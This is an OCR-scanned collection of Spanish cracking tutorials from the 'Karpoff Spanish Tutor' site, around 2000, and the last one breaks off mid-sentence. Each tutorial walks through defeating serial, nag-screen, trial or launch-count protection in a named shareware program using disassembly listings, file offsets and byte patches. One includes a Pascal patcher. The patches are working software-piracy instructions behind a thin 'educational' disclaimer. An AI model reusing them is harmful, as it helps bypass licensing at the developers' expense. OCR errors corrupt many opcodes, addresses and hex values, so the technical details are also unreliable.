00401213 6201000080 push ep000001_ 
* Reference To: ADVAPISZ BeglresrekReyExa,. Dra: DOcóR 
apuntamos el offset, en de la barra de abajo del w32dasm: 
[Line:345 Pg 7 and 8 of 166 Code Data (2:004011EB ¡Offset OODDOSEBh in File: Copia de starteln.exe 


y abrimos un editor hexadecimal (yo lo hago con el winhex, por lo que tengo que pasar el offset de hex a dec: 


Sebh=1515): 


fl WinHex - [Copia de startcin.exe] 


lei] Ele Edit Search Position Window Eta Options File Manager Help 


Tab] 


Offset Qs 1 2 de da ba A BR TS 

00001488 [| 00 ES 34A 00 00 00 6D 44 24 18 83 C4 08 50 68 30 2...*DS:fA.PhO a] 
00001504 | 60 40 00 FF 15 20 92 40 00 85 CO MF 85 80 00 00/ 0.7. *0, Als. 
00001520 | 00 8D 44 24 0C 8D 4C 24 08 50 51 8D 94 24 18 01| .+-D$.+LS.PQ+”S.. El 
00001536 | 00 00 64 00 68 3F 00 0F 00 64 00 68 68 62 40 00 .J.h?::.3.hhb0: 
00001552 | 64 00 52 68 01 00 00 80 FEF 15 00 92 40 00 8B 4C | 3.Rh...+7..0.<L 
00001568 | 24 08 68 00 01 00 00 68 30 61 40 00 8B 35 FC 91/$.h.:..hda0.<5iu* 


bueno, ya falta poco, ya estamos en el offset, y vemos que tenemos 0f 85 80 00 00 00, 12 bytes, de los cuales, los 4 
primeros son la instruccion jne, simplemente cambiamos el 85 por 84, y entonces pasará de jne a je, y a registrarse 
siempre. (también se pueden nopear los 12 bytes, simplemente poniendo 90 90 90 90 90 90. 


y ya está, tenemos un programa, que nos admite cualquier nombre, y serial que pongamos. 


ahora, si entramos en el registro: hkey_current_userisoftwarelstart cleantconfiguration 


veremos el nombre que pusimos, y el serial válido ;-) 


ahora, podemos hacer un parche, yo lo he hecho en pascal, y el código es muy sencillo: 


program patch; 
uses crt; 
const bytes: record (<-- 1 byte a emparchar] 
a: longint; 
b : byte; 
end =(a:$5ec;b:$84); 
var 
ch:char; 
1:byte; 
f:file; 
fn:file of byte; 
size:longint; 
begin 
clrscr; 
writeln; 
writeln(' parche para start clean 1.2 en español. - por txotxo'); 
writeln; 
writeln(' > buscando startcIn.exe...'); 
assign(f,'startcln.exe”); 
[Si-) reset(f,1); ($i+) 
if ioresult <> O then 
begin 
writeln(' > el archivo no se encuentra ...'); 
halt(1); 
end; 
if filesize (£)<> 31744 then 
begin 


writeln (' > tamaXo incorrecto, debe ser 31.744 bytes'); 


halt (1); 
end; 
seek(f,bytes.a); 
ch:=char(bytes.b); 
blockwrite(f,ch, 1); 
writeln(' > parche aplicado correctamente !!!”); 
writeln(' > visita mi p gina web '); 
writeln(' > www.geocities.com/ttxotxo'); 
sound(1000); 
delay(350); 
nosound; 


end. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: | MP3-Wolf 


PROTECCION: Serial 

Descripcion: Para buscar MP3 

Dificultad: Media 

DOWNLOAD: http: //www.trellian.com/mwolf/ 

Herramientas: ¡132dasm editor Hexadecimal y un cerebro 


CRACKER: dek_0in FECHA: 27/10/2000 


| introduccion 


porque el cracking no es solo parchear saltitos!!! 


saludos a todos!. un tiempito descansando sin escribir ningún tutorial pero aquí regreso. recuerden, cualquier duda 
que tengan, mandenme un mail (mi dirección está debajo del todo). 


bonito programa para buscar mp3s. no es para buscar en toda la internet, ya que hay que introducir la url donde 
queremos buscar, es más bien para buscar en esos ftps que hay miles de canciones. no lo he probado mucho pero 
esto es lo que deduzco. su protección es de un serial y name para registramos. dejaremos un poco de lado al sice y 
no encontraremos un serial válido sino que volvemos a los parcheos no tan fáciles. de todos modos, a ver si alguien 
encuentra un serial váildo y hace un tutorial. 


al atake 


para empezar ejecutamos el programa y no nos aparece ninguna nag. creo que los programadores fueron buenos con 
nosotros. pulsamos el botón de help y ya vemos una opción que dice register. yo llenaré los datos de la siguiente manera: 


o Name: dek_oin 
o serial: 123456789 


pulsamos ok y el mensaje es "invalid registration name or serial number". antes que nada analizamos el archivo con 
file inspector y vemos las siguientes cosas: 


e no está empakado 
+. tampoco está encrypado 
e está hecho en visual c++ 5.0 


bien. al no estar empakado ni encryptado, podemos desensamblarlo con el w32dasm. lo desensamblamos, pulsamos en 
para buscar la cadena de texto "invalid registration name or serial number". la encontramos y hacemos doble clic varias veces 
para ver cuantas referencias hay sobre ella pero tan solo hay una. aquí aparecemos: 


:00407bfb e800820000 call 0040fe00 
:00407c00 83c418 add esp, 00000018 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :00407bd7 (c) 


:00407c03 8d8500ffffff lea eax, dword ptr [ebp+ffffff00] 

:00407c09 50 push eax 

:00407c0a e8fafaffff call 00407709 

:00407c0f 8d4580 lea eax, dword ptr [ebp-80] 

:00407c12 50 push eax 

:004070c13 esflfaffff call 00407709 

:00407c18 8d4580 lea eax, dword ptr [ebp-80] 

:00407c1b 50 push eax 

:00407c1lc Sd8500fftfEfEF lea eax, dword ptr [ebp+ffffff00] 

:00407c22 50 push eax 

:00407c23 e84d070000 call 00408375 ¡llama a la rutina de comprobación 
:00407c28 83c410 add esp, 00000010 ¿suma 10 a esp 

:00407c2b 85c0 test eax, eax ¿si el flag es cero 

:00407c2d 7540 jne 00407c6£ ¿si no es cero salta a 00407c6f 


* reference to: user32.loadstringa, ord:0labh 


:00407c2f 8b3d8c614100 mov edi, dword ptr [0041618c] 

:00407c35 bb00100000 mov ebx, 00001000 

:00407c3a 53 push ebx 

:00407c3b 56 push esi 

* possible reference to string resource id=01459: "invalid registration name or serial 
number" 

:00407c3c 6853050000 push 000005b3 

:00407c41 ff351c514200 push dword ptr [0042511c] 

:00407c47 ffd7 Call edi 

:004070c49 53 push ebx 

:004070c4a bb80bc4100 mov ebx, 0041bc80 

:00407c4f 53 push ebx 

* possible reference to string resource id=01460: "invalid registration" 
:00407c50 6854050000 push 000005b4 


claramente se puede ver que hay una llamada arriba del mensaje. también hay un salto arriba del mensaje pero si lo 
cambiamos lo único que estaríamos haciendo sería hacer que el programa nos diga "gracias por registrarse!!!" pero al cerrar 
el programa y volverlo a abrir éste ya no está registrado. si quieren pueden probar. como esta técnica no funciona nos 


tenemos que situar sobre la llamada y pulsar el botón para entrar en la llamada. es igual que presionar f8 en el sice. 
aparecemos aquí: 


:00408370 5d pop ebp 
:00408371 5b pop ebx 
:00408372 c21000 ret 0010 


* referenced by a call at addresses: 
:00407c23 , :00408152 , :0040£727 ; no nos sirve de nada 
:00408375 55 push ebp ¡aquí aparecemos 


:00408376 8bec mov ebp, esp 

:00408378 83ec70 sub esp, 00000070 

:0040837b 53 push ebx 

:0040837c 56 push esi 

:0040837d 57 push edi 

:0040837e 8b7d0c mov edi, dword ptr [ebp+0c] 

:00408381 85ff test edi, edi 

:00408383 0f£8429010000 je 004084b2 ; esto no nos interesa porque 
:00408389 8b7508 mov esi, dword ptr [ebp+08] ; lo que tenemos que hacer es 
:0040838c 85£6 test esi, esi ; que la call siempre devuelva 
:0040838e 0f841e010000 je 004084b2 ; el valor de 1 

:00408394 803f£4d cmp byte ptr [edil, 4d 

:00408397 0f850a010000 jne 004084a7 


como la comparación que habíamos visto anteriormente era test eax, eax y luego jne 00407c6f lo que tendremos que hacer 
será que la call siempre devuelva un valor de 1 para que siempre salte a 00407c6f, ahí saltaría si estuviéramos registrados. lo 
que haremos será poner un mov eax, 00000001 y un ret para que eax se convierta en 1 y de esta manera, al tener un ret 
luego de que eax se convierta en 1, la call devolverá ese valor y por lo tanto quedaremos registrados. pero ¿como sabemos 
los bytes a cambiar para que nos quede mov eax, 000000012. fácil. usaremos el modo debugger del w32dasm. presionamos 
[ctrl+I], luego presionamos load y estamos en el debugger del w32dasm. si se fijan hay un botón que dice "patch code", pues 
presiónenlo. para eso está el botón, para saber por que bytes remplazar algo. donde dice "enter new instruction below" 
escriban mov eax, 00000001, aprieten <enter> y nos da estos bytes bk801000000. el los bytes del ret son c3. 


abrimos nuestro editor hexadecimal favorito, vamos al offset 8375 y cambiamos 55 8b ec 83 ec 70 por b8 01 00 00 00 c3. 
ejecutamos el programa y listo!, ya no aparece el menú de register. programa crackeado!!!. esta misma técnica también se 
puede usar para crackear un programa llamado "image wolf". 


a estas alturas creo que no es necesario mencionar que este tutorial ha sido creado solo con fines educativos y que yo no 
puedo hacerme responsable del mal uso que ustedes le puedan dar a esta información. si les gusta el programa debes 
comprarlo!!! 


bye bye! 
saludos a: 


todo [k-for] 
Xasx 
karpoff 
mr.mauve 
act mago 
[the pope] 


página oficial del grupo k-for:_ http: //pagina.de/kfor 
mi dirección de e-mail: dek ointdhotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: FileSplit 2.21 

PROTECCION: NagScreen ,Limitacion de Tiempo 

Objetivo: Eliminar Tiempo Limite y Nagscreen 

Descripcion: Un File Splitter 

Dificultad: Facililla 

DOWNLOAD : No lo recuerdo, Busquen en www.download.com 

Herramientas: W32dams, editor hexadecimal 

CRACKER: Gohan FECHA: Desconocida 
introduccion 


hola ahora si me han seguido en mis lecciones no son ya unos principiantes con los conocimientes que tienen 
hasta ahora con mis manueales ya estan apunto de pasar a nivel intermedio que es donde estoy yo pero cada 
vez se aprende y mientras descubra algo nuevo lo indicare en lecciones y espero que ustedes tambien 
compartan este conocimientos con los demas, y ahora con el mensaje: 


antes que nada tu quieres ser un great saiyan? 

bueno si quieres serlo mi e-mail gohanOchevere.com . hací que me escribes si quieres formar parte de los 
mas poderosos del universo. ademas diganme si mis tutoriales necesitan mas explicacion, ademas aceptó 
pedidos de cracks. 


al atake 


1-primer paso: 


abrimos el programa nos aparece un maldito nagscreen que nos cuenta los días de evaluación, bueno nos salimos y 
adelantemos nuestro reloj un aproximado de 35 días y abramos el programa y nos aprece un despreciable nagscreen 
pidiendo nuestro nombre y codigo presinamos cancel y se sale del programa, si te fijaste bien en el nagscreen donde te 
muestran los días de evaluacion decia arriba "aboutbox", y en el otro decia arriba "evaluation period for filesplit has 


ended" bueno buscaremos cualquiera de ellos a ver cual aparece. 


2-segundo paso: 


desamblamos el fsplit.exe, ahora presiona en "strnref" y busca el que te aparece nada mas es "aboutbox" presiona sobre 


el y te aparecera este codigo: 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00402a35(c) 


:00402a3b 8b4c2414 mov ecx, dword ptr [esp+14] 
:00402a3f 8d54241c lea edx, dword ptr [esp+1c] 
:00402a43 52 push edx 

:00402a44 894c2424 mov dword ptr [esp+24], ecx 
:00402a48 e833430000 call 00406d80 

:00402a4d 8b442428 mov eax, dword ptr [esp+28] 
:00402a51 830404 add esp, 00000004 

:00402a54 3bc5 cmp eax, ebp 

:00402a56 6400 push 00000000 

:00402a58 752b ¡ne 00402a85 "si salta nos lleva al aboutbox" 
:00402a5a a1f0ce4100 mov eax, dword ptr [0041cef0] 
:00402a5f 6820524000 push 00405aa0 

:00402a64 6400 push 00000000 


* possible reference to dialog: dialogid_0073 


:00402a66 6473 push 00000073 "el nag de expiracion" 
:00402a68 50 push eax 


* reference to: user32.dialogboxparama, ord:008eh "el programa" 


:00402a69 ff15b4f54100 call dword ptr [0041f5b4] 
:00402a6f 3400050000 cmp eax, 00000500 

:00402474 7428 je 00402a9e "si salta se ejecuta el programa" 
:00402a76 33c0 xor eax, eax 

:00402a78 Sf pop edi 

:004024a79 Se pop esi 

:00402a7a 5d pop ebp 

:00402a7b 5b pop ebx 

:00402a7c 81c484030000 add esp, 00000384 

:00402a82 c21000 ret 0010 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00402a58(c) 


:00402a85 8b0df0ce4100 mov ecx, dword ptr [0041 cef0] 
:00402a8b 68d0504000 push 00405000 "el nag aboutbox" 
:00402a90 6400 push 00000000 


* possible stringdata ref from data obj ->"aboutbox" 


:00402a92 6818994100 push 00419918 
:00402a97 51 push ecx 


* reference to: user32.dialogboxparama, ord:008eh "el programa" 


| 
:00402a98 ££15b4154100 call dword ptr [0041f5b4] 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
1:00402976(c), :00402a74(c) 


:00402a9e 53 push ebx 

:00402a9f esbc000000 call 00402b60 
:00402a24 830404 add esp, 00000004 
:00402aa7 85c0 test eax, eax 
:00402aa9 750d ¡ne 00402ab8 
:00402aab 5f pop edi 

:00402aac 5e pop esi 

:00402aad 5d pop ebp 

:00402aae 5b pop ebx 

:00402aaf 810484030000 add esp, 00000384 
:00402ab5 c21000 ret 0010 


el crack: 

haremos el crack mas rapido y con menos alteraciones posibles aunque mejor hago los dos tipos de crack: 

el posee menos alteraciones: 

se cambia (¡ne 00402a85) por (¡mp 00402a85) y de esta forma esta fuera el timelimit , ademas se cambia (push 
00405000) por (push 00000000) y asi se elimina el nagscreen. 


el mas largo y menos aconsejable: 

se cambia (¡ne 00402485) por (¡ne 00402a5a),para que no ejecute el about box; ademas (push 00000073) por (push 
00000000) para eliminar el nag de la registro y por ultimo (je 00402a9e) por (¡mp 00402a9e) para que el programa se 
ejecute. 


aquí los dejo espero que mis lecciones sirvan para algo ya que voy por la decima y llevo solo 3 semanas. les aconsejo 
estudiar algunos tutoriales de asm para que crackeen mejor cada día. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Theme Maker v3.0 


Serial 

Conseguir un número de serie válido 
Crea tus propios temas de escritorio 
Nula, Ultra Super Hiper Newbie 


www.soft-shop.com 
file insPEctor v3.0 y Win32Dasm v8.93 
Act Mago FECHA: 


INTRODUCCION 


hola amigos, presento mi décimo tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


08/11/2000 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 
introducción 


este es el bonus track, pensé en no escribirlo porque esta protección no merece un tutorial, pero lo hice para que 
aquellos que recién estén comenzando se den cuenta de que hay programas que supuestamente están protegidos y 
al final de cuentas no tienen ningún impedimento y no requieren de ningún conocimiento para ser crackeados. 


comentario del programa 


crea tus propios temas de escritorio totalmente completos 


theme maker te permitirá diseñar y capturar imágenes, para guardarlas como cursores, íconos y fondos de 
escritorio para windows, así podrás crear tus propios temas de escritorio y distribuirlos por internet. 


cualquier imagen la podrás capturar, y podrás añadir áreas transparentes usando el editor de cursores e iconos. 
simplemente tendrás que arrastrar y soltar la imagen sobre el ícono o cursor que quieras modificar, añadirle un 
fondo de escritorio, y asignarle sonidos específicos a cada uno de los eventos para completar tu propio tema de 


escritorio. 


además, podrás testear los temas que hayas hecho, deshacer cualquier cambio realizado, y procesar imágenes 


animadas. 


al atake 


abrimos el programa y nos dirigimos a la lengúeta que dice register y vemos un lugar para insertar el código o número de 
registro, se verá así... 


Í>. Theme Maker 


como hacemos siempre insertamos cualquier cosa, presionamos register y ... pero qué paso ?? nos manda al sitio web 
para obtener el número de registro, ok no hay botón de registro, entonces eso quiere decir que a medida que vayamos 
introduciendo el número de registro el programa lo irá comprobando. 


a continuación... cerramos theme maker. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará si está encriptado y también en que leguaje está hecho. abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable theme maker.exe , luego le damos 
click a analizar y luego a la lengúeta que dice compilador...se verá así: 


2, -= file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


E Herramientas | Acerca de... | 


¡Reconocimiento de signaturas 
Compilador: Borland C++ for Win32 1995 (1) 
Signatura: 
Versión de la DLL: [r 0 Información... £D Asociar EXE 's 


Versión del enlazador: [2.25 Versión de la imagen: fo.o 
Versión del SO: fi ¿0 Versión del subsistema: [4.0 


(3 Abrir archivo,.. L£Y Analizar Í salir 
¡CsArchivos de orooramax Theme MakerTheme Maker.exe [ 


a continuación... cerramos file inspector v3.0. 


usando w32dasm 


asumo que tienes conocimientos básicos sobre el uso de w32dasm. 


abrimos w32dasm y vamos a la opción disassembler ----> open file to disassemble. buscamos el ejecutable del 
programa theme maker.exe 


una vez terminado el proceso, vamos a string data references y buscamos algo que nos parezca familiar, y ¡¡¡ miren con lo 
que nos encontramos !!!! 


4/32Dasm List of String Data Items af xl 
To Search Disassembly for String Data. Double Click on Text Cancel Search 


"INF" 
"NAN" 
"<notype>” 


> 


"Abnormal program terminatior'" 
"AboutBox' 

1 'A80 N “ 

"ActiveBorder" 

"ActiveTitle" 

"ActiveX" Y] 


Copy All Copy View] 


no lo puedo creer!! si vamos al programa y metemos ese número el programa estará registrado !!! 


programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


saludos 


e saludos a tnt!crack!team ( saludos a xasx, no parare : ) ) 


e saludos a dek_oin. 
e saludos y agradecimientos a V| per del grupo [k-for], por el genial file inspector. 


e saludos a toda la people de tutoriales2000. 
e saludos a profesor x. 


e saludos al Ida (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, peter 
y a todos los demás) 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Toggle QuickScroll v1.0.2 


PROTECCION: Mane / Serial, Limitacion de Tiempo 30 dias 
Descripcion: Utilidad para hacer scroll con el ratón 
Dificultad: Facililla 


DOWNLOAD : http: //ww.toggle.com 
Herramientas: W32dasm 8.93, Hex Workshop 3.11 


Shark | FECHA: | 14/11/2000 


CRACKER: 


INTRODUCCION 


¡hola a todos!. bueno, este es mi primer tutorial, con lo cual queda claro que soy un novato. por eso me he 
decidido ha escribirlo; para ayudar a todos los que como yo estamos empezando. 


he elegido toggle quickscroll porque los programas de la compañia toggle son ideales para los que estamos 
empezando. tienen una proteccion muy sencilla, aunque la de este programa es un poco mas complicada que 
las de otros programas de la misma compañia. ¡van mejorando! 


al atake 


bien, instalamos el quickscroll y lo ejecutamos. nada mas ejecutarlo nos sale un ventanita que nos cuenta la historia de 

la informatica, una barra que nos indica los dias que nos quedan de uso y dos botones: "order now" y "close". pulsamos 
sobre "order now" y nos aparece otra ventana que entre otras cosas tiene un boton que nos dice "enter your registration 
code"; pulsamos y nos aparece otra ventanita donde nos pide los datos de registro. pues nada, los introducimos, que 
para eso estamos. name: shark. reg.code:123456789 y como es logico nos dice que "naranjas de la china”, bueno pues 
nos apuntamos la frase que aparece "the registration information you.......''. con esto ya tenemos por donde empezar, 
hacemos una copia del togglequickscroll.exe y la desensamblamos con el w32dams, le damos a las "'strn ref" y 
buscamos la cadena que hemos apuntado. llegamos aqui... 


4/32Dasm List of String Data ltems al [E 


To Search Disassembly for String Data, Double Click on Text 


"RetumEursor" 


"Scroll without scroll bars...” 
"ScrollBar" 


"SoftwarerMicrosoftWwindowsCurrentersionE xpl'" 
"SAUS" 


“Tip: lf pou are using other mouse ** 
"Tip: To start scrolling, just * 


aan 
OO 
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o 
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SS 
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Ou 
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hacemos doble click sobre la cadena, para ver donde nos lleva. repetimos la operacion por si tuviesemos mas de una 
referencia a la misma cadena. parece que no. aparecemos aqui........ 


bien, vemos que por encima de nuestra cadena tenemos una referencia a un salto condicional en 00403848. vamos 
subiendo hasta llegar al salto y aparecemos aqui. 


por encima del salto vemos que tenemos una llamada, despues compara eax con 1 y si no es igual salta a la referencia 
del numero de registro invalido. en cambio si no salta pasara por la refencia "registration is complete". por tanto 
vamos ha hacer que no salte. apuntamos el offset del salto "3848", entramos en el hex worpshop, vamos al menu edit - 
goto... y lo introducimos. para que no salte nunca cambiamos "7517" por "9090". salvamos, salimos y vamos a probar. 


ejecutamos el togglequickscroll introducimos el name: shark y el reg.code:123456789 y ¡perfecto nos sale la ventanita 
de que estamos registrados!. salimos del programa y volvemos ha entrar para comprobar que es asi. 


¡¡no!!, nos vuelve ha aparecer la ventana para registrarnos. ¿que ha sucedido?. lo que ha sucedido es que realmente no 
estamos registrados, solamente hemos obligado al programa ha pasar por el mensaje de "registration is complete". 
volvamos ha abrir el ejecutable con el w32dasm y vallamos a nuestro salto. encima de él tenemos una llamada " call 
00403370 " que es donde se compueba nuestro n” de serie. pues nada, entraremos en ella para ver que encontramos. 
aparecemos en: 


:00403370 6atff push f£ffffff 


bajamos por las lineas de codigo y vemos que llegamos a una zona muy interesante, en la que tenemos un salto 
condicional " ¡ne 004034f9 " que si salta evita todo el codigo que hace referencia al numero de registro. entonces 
evitaremos que salte. apuntamos el offset " 3428 ", entramos en el hex workshop y cambiamos " 0f85cb000000 por 
909090909090 ". 


hecho esto volvemos ha inspeccionar el codigo que hay mas arriba por si tuvieramos algun otro salto que tambien evite 
el codigo referente al registro. efectivamente, encontramos otro salto " jl 004034f9 " que si se produce evitara el 
codigo de registro. procederemos de la misma manera que en el caso anterior. apuntamos el offset " 33d2 " y en el hex 
workshop cambiaremos " 0f8c21010000 " por " 909090909090 ". 


salvamos, salimos y vamos a probar. 


ejecutamos el togglequickscroll introducimos el name: shark y el reg.code:123456789 y ¡perfecto nos sale la ventanita 
de que estamos registrados!. salimos del programa y volvemos ha entrar para comprobar que es asi. y ¡¡si!! esta vez si 
que estamos registrados. 


hasta mi proximo tutorial. ¡espero que sea pronto.! saludos a todos los que se mueven en este mundillo. y a los que no 
tambien. 


shark 


karpoff spanish tutor: 


pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


PROTECCION: . 14 ejecuciones límite y serial 

Objetivo: . Eliminar las 14 ejecuciones límite y usar el programa como si estuviera registrado. 

Descripcion: Programa para crear tus propios diccionarios 

Dificultad: Newbie 

DOWNLOAD : ftp://ftp.simtel .net/pub/simtelnet/win95/lang/d2k511.zip 

Herramientas: W32dasm y un Editor Hexadecimal 

CRACKER : dek_Oin FECHA: 06/10/2000 
INTRODUCCION 


hola amigos. esta vez nos vemos en mi noveno tutorial. he recibido un mail diciéndome que no podía crackear 
este programa y por esa razón hago este tutorial. antes de leerlo, traten a ver si pueden crackearlo ustedes 
solos, realmente es muy fácil aunque tiene lo suyo, cosa que puede confundir a alguien con muy poca 
experiencia. también he recibido algunos mails diciendo que cambiaban un je por un jne y podía registrar el 
programa, pero cuando lo cerraban y lo volvían a iniciar el programa ya no estaba registrado. espero poder 
aclararles esta duda más abajo. 

creo que este programa sirve para crear tus propios diccionarios. si es así, este uso lo veo un poco absurdo, 
escribir miles de palabras cuando podemos utilizar los diccionarios del word. pero lo peor no es esto, lo peor es 
que los programadores quieren que les paguemos por producir su horripilante software que para lo único que 
sirve es para practicar técnicas de cracking. si esta es su utilidad pues adelante, vamos a crackear!!!, 


al atake 


ejecutamos el programa y... esto no me gusta nada. nag diciéndonos que nos quedan 13 usos. hmmm, todo huele mal. 
ejecutémoslo 14 veces a ver que pasa. 1, 2, 3, 4, 5, ... 14: 


(Xx) Now you have to register. 


y luego nos aparece el programa con un montón de funciones deshabilitadas, en otras palabras, el programa ya no sirve 
para nada. pulsemos sobre el botón register y aparece una horrible ventanita para introducir nuestro código. yo pondré lo que 
se muestra en la imagen: 


See help for detals. 


[No me gusta este programal!! Register. | 


pulsamos sobre register y nos aparece una ventana diciendo "no me gusta este programa!!!" is not a valid integer value. 
ataquemos con el w32dasm. primero que nada hagamos una copia del ejecutable. luego desensamblamos y busquemos en 
las string references algo sospechoso. casi al final encontramos una que dice "unregistered. you have", esto era lo que nos 
recordaba que nos quedaban tantos usos. hagamos doble clic sobre ella y aparecemos en esta zona: 


:01061910 e8d303ffff 
:01061915 e84a20faff 


Call 01051ce8 
call 01003964 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:010618fe (c) 

:010619l1a 813d98c2060110270000 cmp dword ptr [0106c298], 00002710 

:01061924 7d73 jge 01061999 

:01061926 ff0d98c20601 dec dword ptr [0106c298] 

:0106192c e85ffeffff Call 01061790 

:01061931 có605a0c0060100 mov byte ptr [0106c0a0], 00 

:01061938 8b1d98c20601 mov ebx, dword ptr [0106c298] 

:0106193e 85db test ebx, ebx 

:01061940 dle jge 01061960 <-========--- el salto al que hacen referencia los mensajes. 
:01061942 c605a1co060101 mov byte ptr [0106c0a1], 01 

:01061949 6a00 push 00000000 

:0106194b 668b0dd8190601 MOV CX, word ptr [010619d8] 

:01061952 b201 mov dl, 01 

* possible stringdata ref from code obj ->"now you have to register." <----=------ zona interesante 


:01061954 b80c1a0601 
:01061959 e88a03ffff 
:0106195e eb40 


mov eax, 0l106la0c 
Call 01051ce8 
jmp 010619a0 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|LOLO619IAO (0) e mensaje llamado desde 01061940. 


:01061960 6a00 push 00000000 


*posible stringdata ref from code obj ->"unregistered you have"lo que buscabamos 


:01061962 68301a0601 p 
:01061967 8d55f8 

:0106196a 8bc3 mov eax, ebx 
:0106196c e8676afaff call 010083d8 
:01061971 ff75f8 push [ebp-08] 


push 01061a30 
lea edx, dword ptr [ebp-08] 


* possible stringdata ref from code obj ->" launches left "<--esta y la de arriba estaban en el 
| mismo mensaje 


:01061974 68501a0601 push 01061a50 

:01061979 8d45fc lea eax, dword ptr [ebp-04] 
:0106197c ba03000000 mov edx, 00000003 

:01061981 e85624faff call 01003ddc 

:01061986 8b45fc mov eax, dword ptr [ebp-04] 
:01061989 668b0d601a0601 mov CX, word ptr [01061a60] 
:01061990 b202 mov dl, 02 

:01061992 e85103ffff Call 01051ce8 

:01061997 eb07 jmp 010619a0 


está claro que el los mensajes de error fueron llamados desde el salto ubicado en 01061940. pero ese salto es un salto 
incondicional. ¿que tal si lo cambiamos por eb para que no salte solo si es mayor o igual sino que salte siempre?, probemos. 
abramos el hex workshop insertemos el offset del salto (60d40) y cambiamos 7dle por ebld. bien, probamos el programa 
y... ja!ja!ja!ja!ja!ja! genial, ja!ja!ja!ja!, quisiera ver la cara del programador si nos observara ja!ja!ja!, lo que hicimos con su 
software. iniciamos y nag diciendo "you have 25 uses left", ya extendimos los usos. iniciamos de nuevo y nag diciendo "you 
have 26 uses left" y luego 27 uses left, y 28, 29, 30, ja!ja!ja!ja!. esto del cracking me encanta!!!. pero no hicimos el crack 
perfecto, además, nos podemos reír todo lo que queramos (ja!ja!ja!ja!ja!ja!ja!) de lo que le hicimos a los programadores pero 
si usamos mucho el programa (cosa que dudo) se vuelve incómodo tener que apretar "aceptar" cada vez que iniciemos el 
programa, así que vamos a hacer el crack perfecto. 


aquí viene lo que pudo confundir a más de uno. si ven arriba del salto que cambiamos, hay otro aviso de que todas las 
nags y las limitaciones fueron llamadas desde un salto ubicado en la dirección O10618fe. pues vamos a esa dirección. goto/go 
to code location y escribimos la dirección. apareceremos aquí: 


:010618de c70598c206010f000000 mov dword ptr [0106c298], 0000000f 
:010618e8 e8a3feffff call 01061790 
:010618ed e%ale000000 jmp 010619a0 


* referenced by a (u)nconditional or (c)onditional jump at address: <---no nos interesa 
| :010618dc (c) 


:010618£2 e8elfdffff call 010616d8 

:010618£7 803da8c006010c cmp byte ptr [0106c0a8], Oc 

:010618fe 74la je 01061912 rro o-- nuestro saltito 
:01061900 6a00 push 00000000 

:01061902 668b0dd8190601 MOV CX, word ptr [010619d8] 

:01061909 b201 mov dl, 01 


* possible stringdata ref from code obj ->"charset.cfg missing or corrupt" 


:0106190b b8e4190601 mov eax, 010619e4 
:01061910 e8d303ffff call 01051ce8 
:01061915 e84a20faff call 01003964 


¿que les parece si cambiamos ese salto por el opuesto?, probemos. offset, 60cfe. abrimos hex workshop edit/goto y 
escribimos el offset. cambiamos el salto por 751a, ejecutamos el programa y banggg "charset. cfg missing or corrupt". no 
modificamos el salto indicado. para este tipo de situaciones es que hacemos la copia del ejecutable. la desensamblamos y 
vemos más arriba de ese salto, en esta zona: 


:010618a9 66 byte 66h 
:010618aa 69 byte 69h 
:010618ab 67 byte 67h 


* referenced by a call at addresses: <=====n=mmmman ahora se resuelve todo... 


|:01065f0c , :01065faf 


:010618ac 55 push ebp 

:010618ad 8bec mov ebp, esp 

:010618af 6a00 push 00000000 

:010618b1 6a00 push 00000000 

:010618b3 53 push ebx 

:010618b4 33c0 xor eax, eax 

:010618b6 55 push ebp 

:010618b7 68bb190601 push 010619bb 

:010618bc 64f£f30 mov dword ptr fs: [eax], esp 
:010618c2 có605a0co060101 mov byte ptr [0106c0a0], 01 
:010618c9 có605a1co060100 mov byte ptr [0106c0a1], 00 


* possible stringdata ref from code obj ->"author" 


:010618d0 b8d0190601 mov eax, 010619d0 

:010618d5 eSbabcfaff call 01008594 

:010618da 84c0 test al, al 

:010618dc 7414 je 010618f2 

:010618de c70598c206010f£000000 mov dword ptr [0106c298], 0000000f 
:010618e8 e8a3feffff call 01061790 

:010618ed e%ale000000 jmp 010619a0 


creo que ahora la cosa está clara. todas las limitaciones de usos, las nags, mensajes de error, etc fueron llamadas desde dos 
calls ubicadas en las direcciones O1065f0c y O1065faf. lo que tenemos que hacer es parchear esas calls para que nada de esto 
